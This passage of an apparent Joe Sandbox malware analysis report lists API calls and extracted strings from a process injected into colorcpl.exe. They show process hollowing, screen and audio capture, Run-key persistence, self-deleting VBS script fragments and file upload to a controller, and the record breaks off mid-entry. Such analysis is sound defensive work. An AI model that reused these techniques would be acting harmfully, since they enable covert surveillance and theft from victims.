                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 030A6E98
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 030A6EA5
                                                                • Part of subcall function 030A72DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 030A730F
                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 030A6F1B
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F32
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F35
                                                              • DeleteObject.GDI32(00000000), ref: 030A6F38
                                                              • SelectObject.GDI32(00000000,00000000), ref: 030A6F59
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F6A
                                                              • DeleteDC.GDI32(00000000), ref: 030A6F6D
                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 030A6F91
                                                              • GetIconInfo.USER32(?,?), ref: 030A6FC5
                                                              • DeleteObject.GDI32(?), ref: 030A6FF4
                                                              • DeleteObject.GDI32(?), ref: 030A7001
                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 030A700E
                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 030A7026
                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 030A7095
                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 030A7104
                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 030A7128
                                                              • DeleteDC.GDI32(?), ref: 030A713C
                                                              • DeleteDC.GDI32(00000000), ref: 030A713F
                                                              • DeleteObject.GDI32(00000000), ref: 030A7142
                                                              • GlobalFree.KERNEL32(?), ref: 030A714D
                                                              • DeleteObject.GDI32(00000000), ref: 030A7201
                                                              • GlobalFree.KERNEL32(?), ref: 030A7208
                                                              • DeleteDC.GDI32(?), ref: 030A7218
                                                              • DeleteDC.GDI32(00000000), ref: 030A7223
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                              • String ID: DISPLAY
                                                              • API String ID: 479521175-865373369
                                                              • Opcode ID: d2ab732fb6e4899ff1758081f3716ad3510d3e569f9be3f673f956f09578bc26
                                                              • Instruction ID: 2605e09be2273d0ecbb8d49c361cee3ba4d629e13d0a4402add2630bf949dcb0
                                                              • Opcode Fuzzy Hash: d2ab732fb6e4899ff1758081f3716ad3510d3e569f9be3f673f956f09578bc26
                                                              • Instruction Fuzzy Hash: B0B16B35605704AFD760EFA8E844B6BBBE8FF88B10F04481DF9899B240DB35E905CB52
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 030A6474
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A6477
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 030A6488
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A648B
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 030A649C
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A649F
                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 030A64B0
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030A64B3
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 030A6555
                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 030A656D
                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 030A6583
                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 030A65A9
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 030A662B
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 030A663F
                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 030A667F
                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 030A6749
                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 030A6766
                                                              • ResumeThread.KERNEL32(?), ref: 030A6773
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 030A678A
                                                              • GetCurrentProcess.KERNEL32(?), ref: 030A6795
                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 030A67B0
                                                              • GetLastError.KERNEL32 ref: 030A67B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                              • API String ID: 4188446516-3035715614
                                                              • Opcode ID: 5fcae474ebb997de07b223a2e9d37be2ab7cdca9d301b9baaea03c2b5a9f588d
                                                              • Instruction ID: 59abc7417ca2cc8267938a269ac24904fc3ba460656072c981c15666bcef3ec2
                                                              • Opcode Fuzzy Hash: 5fcae474ebb997de07b223a2e9d37be2ab7cdca9d301b9baaea03c2b5a9f588d
                                                              • Instruction Fuzzy Hash: 72A18CB0602309AFD750DFA8EC85B6BBBF8FF48745F080819F6959A250D77AD844CB15
                                                              APIs
                                                                • Part of subcall function 030A12B5: TerminateProcess.KERNEL32(00000000,031021E8,0309E2B2), ref: 030A12C5
                                                                • Part of subcall function 030A12B5: WaitForSingleObject.KERNEL32(000000FF), ref: 030A12D8
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0309C0D6
                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0309C0E9
                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0309C102
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0309C132
                                                                • Part of subcall function 0309A7F2: TerminateThread.KERNEL32(03099305,00000000,031021E8,0309BC76,?,03102200,pth_unenc,031021E8), ref: 0309A801
                                                                • Part of subcall function 0309A7F2: UnhookWindowsHookEx.USER32(?), ref: 0309A811
                                                                • Part of subcall function 0309A7F2: TerminateThread.KERNEL32(030992EF,00000000,?,03102200,pth_unenc,031021E8), ref: 0309A823
                                                                • Part of subcall function 030AA17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309C37D
                                                              • ExitProcess.KERNEL32 ref: 0309C389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                              • API String ID: 1861856835-1536747724
                                                              • Opcode ID: 3da7dcb6f204d579e45dc1a9666deebf3f32afb0df369c5ec1ddcfe65dfa3e1b
                                                              • Instruction ID: ca47ad61436336ee4903b27eae156e232bdfcb98b536cca70c23f83438ff89a3
                                                              • Opcode Fuzzy Hash: 3da7dcb6f204d579e45dc1a9666deebf3f32afb0df369c5ec1ddcfe65dfa3e1b
                                                              • Instruction Fuzzy Hash: 1191D0397073055FEA18F764E860AEF77E89FD4610F04092FE1869F1A1EF209D4AE652
                                                              APIs
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,03102200,03101FFC,00000000), ref: 030A0EF9
                                                              • ExitProcess.KERNEL32(00000000), ref: 030A0F05
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 030A0F7F
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 030A0F8E
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 030A0F99
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A0FA0
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A0FA6
                                                              • PathFileExistsW.SHLWAPI(?), ref: 030A0FD7
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 030A103A
                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 030A1054
                                                              • lstrcatW.KERNEL32(?,.exe), ref: 030A1066
                                                                • Part of subcall function 030AA17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 030A10A6
                                                              • Sleep.KERNEL32(000001F4), ref: 030A10E7
                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 030A10FC
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 030A1107
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A110E
                                                              • GetCurrentProcessId.KERNEL32 ref: 030A1114
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                              • String ID: .exe$WDH$exepath$open$temp_
                                                              • API String ID: 2649220323-3088914985
                                                              • Opcode ID: 523998985a9254b3a48e376a8606ba168ce9e29c311c3dc91c2262964ab3e030
                                                              • Instruction ID: 0ab0c227af2d875d76df8af78bbd503b1f395f6655460de6ec2125fd4910d578
                                                              • Opcode Fuzzy Hash: 523998985a9254b3a48e376a8606ba168ce9e29c311c3dc91c2262964ab3e030
                                                              • Instruction Fuzzy Hash: F551D175B0270DAFDF54FBE4BC58EEE33AD9B44610F000595F502AB181EF798E468A50
                                                              APIs
                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 030A90F2
                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 030A9106
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,030F3050), ref: 030A912E
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 030A9144
                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 030A9185
                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 030A919D
                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 030A91B2
                                                              • SetEvent.KERNEL32 ref: 030A91CF
                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 030A91E0
                                                              • CloseHandle.KERNEL32 ref: 030A91F0
                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 030A9212
                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 030A921C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                              • API String ID: 738084811-1354618412
                                                              • Opcode ID: cbba2fc95ff75384b1264cf49dd62024d34ddba3cc0dafa3ae538e9b6f55d862
                                                              • Instruction ID: 194ed80d1ca4c19fea59c12af07d67f7a6468e4fd706d91bc560af4561ad37ba
                                                              • Opcode Fuzzy Hash: cbba2fc95ff75384b1264cf49dd62024d34ddba3cc0dafa3ae538e9b6f55d862
                                                              • Instruction Fuzzy Hash: C751F3793063497FEA08FBB4EC94EFF369C9BC4298F00042EB1069A590DF654D48DA22
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0309B882
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,03101FFC), ref: 0309B89B
                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000,00000000,00000000,?,03101FFC), ref: 0309B952
                                                              • _wcslen.LIBCMT ref: 0309B968
                                                              • CopyFileW.KERNEL32(C:\Windows\SysWOW64\colorcpl.exe,00000000,00000000,00000000), ref: 0309B9E0
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0309BA22
                                                              • _wcslen.LIBCMT ref: 0309BA25
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0309BA3C
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309BC2A
                                                              • ExitProcess.KERNEL32 ref: 0309BC36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                              • String ID: """, 0$6$C:\Windows\SysWOW64\colorcpl.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                              • API String ID: 2743683619-306929222
                                                              • Opcode ID: 70a228feaa2bac866f9704d6cf4b8972e25d0a2229c1e0bfc32316671a163525
                                                              • Instruction ID: bd3c36c52c26e0c6578dde533e58cc24efc96da8d1248ad3b10ffe82d6c57612
                                                              • Opcode Fuzzy Hash: 70a228feaa2bac866f9704d6cf4b8972e25d0a2229c1e0bfc32316671a163525
                                                              • Instruction Fuzzy Hash: FE918B3930A3456FEA1CF765EC60EEF77D9AFD0210F10082FE1468E190EE34994AE652
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 03091AB9
                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 03091AE3
                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 03091AF3
                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 03091B03
                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 03091B13
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 03091B23
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 03091B34
                                                              • WriteFile.KERNEL32(00000000,030FFA9A,00000002,00000000,00000000), ref: 03091B45
                                                              • WriteFile.KERNEL32(00000000,030FFA9C,00000004,00000000,00000000), ref: 03091B55
                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 03091B65
                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 03091B76
                                                              • WriteFile.KERNEL32(00000000,030FFAA6,00000002,00000000,00000000), ref: 03091B87
                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 03091B97
                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 03091BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Write$Create
                                                              • String ID: RIFF$WAVE$data$fmt
                                                              • API String ID: 1602526932-4212202414
                                                              • Opcode ID: 794de5f5b23d96a7bc1d5b5ef1680b38ad37c3b9152ba1673fd316f898a3aafc
                                                              • Instruction ID: 8d7592dbff738dff7238a62a9ca7062586e672ab3587a6b5cd7f2cdb7c3cff2b
                                                              • Opcode Fuzzy Hash: 794de5f5b23d96a7bc1d5b5ef1680b38ad37c3b9152ba1673fd316f898a3aafc
                                                              • Instruction Fuzzy Hash: 28415C726443197EE210DA51DC86FBF7EECEB85E50F40091AF644DA080D7A5A909DBB3
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                              • String ID:
                                                              • API String ID: 3899193279-0
                                                              • Opcode ID: bfc21936189ca15314d3ca42bf3fb9569d35a3586c94d4c30e8f0b4348664f40
                                                              • Instruction ID: a140efa6cfb32025521a6160bc48f673d8570f11d656384e70ff0252b0752eb7
                                                              • Opcode Fuzzy Hash: bfc21936189ca15314d3ca42bf3fb9569d35a3586c94d4c30e8f0b4348664f40
                                                              • Instruction Fuzzy Hash: 74D16B75E077056FEB25EF789884BAEBBE8EF41310F0941ADE942DB284EB359500CB51
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 030A382B
                                                              • LoadLibraryA.KERNEL32(?), ref: 030A386D
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 030A388D
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A3894
                                                              • LoadLibraryA.KERNEL32(?), ref: 030A38CC
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 030A38DE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A38E5
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 030A38F4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 030A390B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                              • API String ID: 2490988753-744132762
                                                              • Opcode ID: d052a33921f8e3f92346733d3407136dd9c4e3da1f4ccb19e6448e78d8a767f3
                                                              • Instruction ID: 82027d327d05b1634c866315711f76002da5f3205c64fa0439f820278e6bff31
                                                              • Opcode Fuzzy Hash: d052a33921f8e3f92346733d3407136dd9c4e3da1f4ccb19e6448e78d8a767f3
                                                              • Instruction Fuzzy Hash: 2B31077A907B15ABC320EBA8E848ECFB7EC9F85750F080A59F94497200D739D5048BA6
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 030AA43B
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030AA47F
                                                              • RegCloseKey.ADVAPI32(?), ref: 030AA749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                              • API String ID: 1332880857-3714951968
                                                              • Opcode ID: acb8f33ad0000c9100c027c6a8400be8b6ff479e0772e9d6ac9e7337b6d94378
                                                              • Instruction ID: c208e12903445fd49ba8960926ecbe638fd4a085365c40266eeb855bd59e38ac
                                                              • Opcode Fuzzy Hash: acb8f33ad0000c9100c027c6a8400be8b6ff479e0772e9d6ac9e7337b6d94378
                                                              • Instruction Fuzzy Hash: 5B815F3520A3459FE728EB55D850EEFB7ECAFD4304F10492EE5868A190EF30A90DDB52
                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 030AB38F
                                                              • GetCursorPos.USER32(?), ref: 030AB39E
                                                              • SetForegroundWindow.USER32(?), ref: 030AB3A7
                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 030AB3C1
                                                              • Shell_NotifyIconA.SHELL32(00000002,03101AE0), ref: 030AB412
                                                              • ExitProcess.KERNEL32 ref: 030AB41A
                                                              • CreatePopupMenu.USER32 ref: 030AB420
                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 030AB435
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                              • String ID: Close
                                                              • API String ID: 1657328048-3535843008
                                                              • Opcode ID: e0a363f1884b20b05944a3dcba67b36ce74d63e7345c6adeba0148babb7feb79
                                                              • Instruction ID: 248bbc0145c29327d4a6d962eee649fbe3029c53c4ec7da0389eb54c06a20322
                                                              • Opcode Fuzzy Hash: e0a363f1884b20b05944a3dcba67b36ce74d63e7345c6adeba0148babb7feb79
                                                              • Instruction Fuzzy Hash: 03213D36202549FFDB09AFB8FC0DA6D7FB5EB18701F084524F506A8468D7BA99509B24
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: f78d1193a72a0d2afc336d8f1f256a902973b533ef057ac30f52baa2ca6266f2
                                                              • Instruction ID: 32acd758a1d59e8f7733160e01edd965ab863e8cf8c7d7fc014aa7eebcaa89ab
                                                              • Opcode Fuzzy Hash: f78d1193a72a0d2afc336d8f1f256a902973b533ef057ac30f52baa2ca6266f2
                                                              • Instruction Fuzzy Hash: 86B1A279A023059FDB11DF68C880BEEFBF5BF48300F1845ADE599AB241DB75A841CB61
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 030DE4EA
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD6FF
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD711
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD723
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD735
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD747
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD759
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD76B
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD77D
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD78F
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7A1
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7B3
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7C5
                                                                • Part of subcall function 030DD6E2: _free.LIBCMT ref: 030DD7D7
                                                              • _free.LIBCMT ref: 030DE4DF
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030DE501
                                                              • _free.LIBCMT ref: 030DE516
                                                              • _free.LIBCMT ref: 030DE521
                                                              • _free.LIBCMT ref: 030DE543
                                                              • _free.LIBCMT ref: 030DE556
                                                              • _free.LIBCMT ref: 030DE564
                                                              • _free.LIBCMT ref: 030DE56F
                                                              • _free.LIBCMT ref: 030DE5A7
                                                              • _free.LIBCMT ref: 030DE5AE
                                                              • _free.LIBCMT ref: 030DE5CB
                                                              • _free.LIBCMT ref: 030DE5E3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: e7fb6986b5da526662e2cff91756806091639532cbcdb682c08f940c946b7fc8
                                                              • Instruction ID: efb6eb1f34edd8febb14c7e92a514f47ff26305bb81026e69cd7547c169cef60
                                                              • Opcode Fuzzy Hash: e7fb6986b5da526662e2cff91756806091639532cbcdb682c08f940c946b7fc8
                                                              • Instruction Fuzzy Hash: 0A31A3756023059FEB61EA38D948B9AB3E8FF40391F5994A9E488DF150EF30E940CB21
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 03097D1F
                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 03097D57
                                                              • __aulldiv.LIBCMT ref: 03097D89
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 03097EAC
                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 03097EC7
                                                              • CloseHandle.KERNEL32(00000000), ref: 03097FA0
                                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 03097FEA
                                                              • CloseHandle.KERNEL32(00000000), ref: 03098038
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldiv
                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                              • API String ID: 1656873915-2596673759
                                                              • Opcode ID: f9f5e0c9969aa2191cbfc4de4da6e4eecd5dbe6aeb336bb2058597d6f645925c
                                                              • Instruction ID: 0eb2ad049ace3884bfe5640ec391017be92f13882eb9ab619c4440a0e3778cf1
